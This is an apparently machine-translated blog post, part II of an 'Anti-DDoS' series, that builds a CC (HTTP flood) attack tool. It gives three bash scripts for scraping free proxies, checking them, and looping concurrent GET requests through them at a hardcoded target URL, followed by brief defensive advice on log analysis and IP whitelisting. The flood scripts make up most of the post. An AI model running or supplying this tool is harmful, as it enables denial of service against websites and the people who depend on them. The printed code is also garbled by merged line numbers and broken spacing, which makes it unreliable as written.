Anti-DDoS (II): CC attack tool implementation and Defense Theory

 

Therefore, the method of attacking the city is the last resort.

Know yourself, know yourself, do not know, do not fight

-- Sun Tzu's Art of War

 

We will implement a tool for DDoS attacks at the application layer. in comprehensive consideration, the CC attack method is the best choice. We will use the bash shell script to quickly implement and verify this tool. At the end, discusses how to defend against DDoS attacks from the application layer.

Step 1: obtain a large number of available proxy ip addresses: port lists

Free proxy visible on the Internet, we use the http GET method to capture html documents, then use regular expressions to filter out the ip port pairs we need, and then verify the availability of each proxy one by one, finally, an available proxy ip port pair is obtained.

1 grab_proxy.sh

1 #! /Bin/bash 2 3 # get proxy list 4 declare proxyListFile = "proxy.txt" 5 declare tmpFile = 'mktemp '6 declare url 7 declare line 8 declare times 9 declare ip10 declare port11 declare i12 declare j13 declare mod14 15 function quit () {16 rm-f $ tmpFile17 exit "$1" 18} 19 20 echo "get proxy list... please wait... "21 22 if [-r" $ proxyListFile "] 23 then24 rm-f $ proxyListFile25 fi26 27 touch $ proxyListFile28 2 9 for url in "http://www.youdaili.cn/Daili/guonei/2215.html" \ 30 "http://www.youdaili.cn/Daili/guonei/2215_2.html" \ 31 "http://www.youdaili.cn/Daili/guonei/2215_3.html" \ 32 "http://www.youdaili.cn/Daili/guonei/2215_4.html" 33 do34 if GET "$ url"> $ tmpFile35 then36 grep-oE '^. * <br/>. * $ '"$ tmpFile" | grep-Eo "([0-9] + )(\. [0-9] +) {3} :( [0-9] +) "\ 37 | sort-n | uniq | awk-F: '{printf ("%-15 s % s \ N ", $1, $2);} '>>$ proxyListFile38 else39 exec 1> & 240 echo" error: get proxy list fail! Chech the url: $ url or the network "41 quit 142 fi43 done44 45 echo" done. total 'cat $ proxyListFile | wc-l 'proxy "46 47 quit 048 # exitView Code

Parameters:

Declare proxyListFile = "proxy.txt" # path of the file where the captured proxy ip port pair is stored

1 check_proxy.sh1 #! /Bin/bash 2 3 # get proxy list 4 declare check_threads = 10 5 declare line 6 declare times 7 declare ip 8 declare port 9 declare i10 declare j11 declare mod12 13 function quit () {14 exit "$1" 15} 16 17 # echo "start check proxy's functionality... "18 19 # retarget the input file to stdin20 if [" $ # "-gt" 0 "] 21 then22 exec 0 <$123 else24 exec 1> & 225 echo" usage: bash $0 proxyListFile.txt "26 echo" error: must have one input arg "27 quit 128 fi29 30 # check proxy's functionality31 times = 032 while read line33 do34 times =34 (times + 1 )) 35 j = 036 for I in 'echo $ line | tr ''' \ n' | grep-e' ^ [^ \ s]. * $''37 do38 j =$ (j + 1 )) 39 if ["$ j"-eq 1] 40 then41 ip = $ i42 else43 port = $ i44 fi45 done46 # echo "times = $ times ip = $ ip port = $ port" 47 # start test48 if GET-t 5-p "http: // $ ip: $ port "" http://baidu.com "&>/dev/null49 then 50 echo" $ ip $ port "51 echo" :) ip = $ ip port = $ port "&>/dev/null52 else53 echo "invalid ip = $ ip port = $ port: please check ip: host or network "&>/proc/self/fd/254 fi & 55 mod =$ (times % check_threads )) 56 if ["$ mod"-eq "0"] 57 then58 wait59 fi60 done61 62 # close the fd of input file63 exec 0> &-64 quit 065 # exitView Code

Parameters:

Declare check_threads = 10 # number of concurrent threads when verifying agent availability, look at the code and we will find that we are using the GET http://baidu.com method, so, the number of concurrent jobs should not be too high :) unless your goal is ......

:)

1 cc.sh

1 #! /Bin/bash 2 3 declare target_url = "http://eecs.cc: 8080/"4 declare get_timeout_sec = 5 5 declare line 6 declare times 7 declare ip 8 declare port 9 declare i10 declare j11 12 function quit () {13 exit "$1" 14} 15 16 # retarget the input file to stdin17 if! ["$ #"-Gt "0"] 18 then19 exec 1> & 220 echo "challenge collapsar attack -- cc attack" 21 echo "usage: bash $0 proxyListFile.txt "22 echo" error: must have one input arg "23 quit 124 fi25 26 echo" report: total 'cat $1 | wc-l' proxy-soldiers are ready for command "27 echo" command: target: $ target_url "28 echo" command: start challenge collapsar attack :) amazing... "29 30 exec 0 <$131 # start challenge collapsar attack32 33 while true34 do35 times = 036 exec 0 <&-37 exec 0 <$138 while read line39 do40 times = $ (( times + 1 )) 41 j = 042 for I in 'echo $ line | tr ''' \ n' | grep-e' ^ [^ \ s]. * $''43 do44 j =$ (j + 1 )) 45 if ["$ j"-eq 1] 46 then47 ip = $ i48 else49 port = $ i50 fi51 done52 echo "times = $ times ip = $ ip port = $ port" 53 # single soldier attack54 if GET-t "$ get_timeout_sec"-p "http: // $ ip: $ port "" $ target_url "&>/dev/null 55 then 56 echo" soldier $ times attack $ target_url :) "57 else58 echo" soldier $ times attack $ target_url miss "59 fi & 60 done61 wait62 done63 64 # close the fd of input file65 exec 0> &-66 quit 067 # exitView Code

Defender:

1. Be familiar with the current system, such as the highest load of the system, the highest data processing capability, and the strengths and weaknesses of the system defense system.
2. Save and analyze historical logs
3. Strict security audit of the current system
4. Report to the public security department to trace attackers.
5. When the website is static, it must not be dynamic. You can regularly generate static pages from the primary database to verify the service usage of the primary database.

6. the defender should be able to quickly and timely discover the extent of attacks and attacks the system is under from a global perspective. In normal times, it should establish an attack emergency strategy and standardize operations, avoid making low-level mistakes in an emergency

The analysis of historical logs will be very important at this time, and the data visualization and statistics methods will be very beneficial:

1. Analyze the average Access frequency of each page

2. Analyze the pages with abnormal Access frequency to obtain the ip address-page Access frequency.

3. Obtain the list of access exception IPs on the access exception page.

4. Analyze logs to obtain the loyal user IP whitelist

5. generally, a page is associated with multiple resources. A single access to such a page usually increases the number of workers for multiple resources at the same time, and the attack program generally does not load the resources that it is not interested in, therefore, this is a very good analysis breakthrough.

 

This article describes how to implement a CC attack tool, one of DDoS attacks, and how to defend against DDoS attacks from the application layer. In the following article, I will implement a firewall module that works in the kernel state and has the blacklist function, which corresponds to the firewall unit in the above-mentioned Defense state machine, it implements autonomous dynamic memory management, uses hash tables to manage ip lists, and can customize the modullar of hash tables.

If you have any questions or suggestions, please leave a message to discuss them.:)

Appendix:

　　Anti-DDoS (I): overview